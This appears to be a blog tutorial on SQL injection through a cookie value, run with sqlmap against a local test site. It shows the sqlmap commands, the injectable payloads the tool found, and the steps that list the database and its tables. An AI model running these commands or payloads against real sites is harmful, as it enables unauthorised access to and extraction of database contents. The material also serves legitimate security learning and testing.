MySQL Injection through Cookies

well this is been out there for a while now . but still I thought of writing a simple tut of SQL Injection trough cookies

What are Cookies ?

A cookie is a message given to a Web browser by a Web server. The browser stores the message in a text file. The message is then sent back to the server each time the browser requests a page from the server. for a example mostly cookies are used to keep a user logged in without making him logging every each time he refreshes the web page

at the moment our current target Cookie Value is the following

PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1

SQL Injection With sqlmap

for this example I’ve used sqlmap sql injector which is a very advance sql injector . the vulnerable cookie parameter is “user_id”

Vulnerbility Identifying 

root@core-VPCCW16FB:# ./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --level 3 --dbms=MYSQL

    sqlmap/1.0-dev (r5108) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

....
[11:30:45] [INFO] heuristic test shows that Cookie parameter 'user_id' might be injectable (possible DBMS: MySQL)
[11:30:45] [INFO] testing sql injection on Cookie parameter 'user_id'
[11:30:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:30:45] [INFO] Cookie parameter 'user_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:30:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[11:30:46] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:30:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:30:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:30:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[11:30:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:30:56] [INFO] target url appears to have 3 columns in query
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: Cookie
Parameter: user_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND 8697=8697

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a676d7a3a,0x595844575a4975764376,0x3a6972633a), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND SLEEP(5)
---

[11:30:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11

Current Database

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --current-db

...
current database:    'test'

Table List

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --tables -D'test'
...
Database: test
[1 table]
+------+
| test |
+------+

and it will keep on going like the normal SQL Injection

Cya ..

About these ads

2 Responses to “MySQL Injection through Cookies”

  1. b!tc0unt Says:

    It’s not only Cookies .. User-Agent , referense . it actually repends. anyway nice article

  2. Thanks! Very Interesting!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 224 other followers

%d bloggers like this: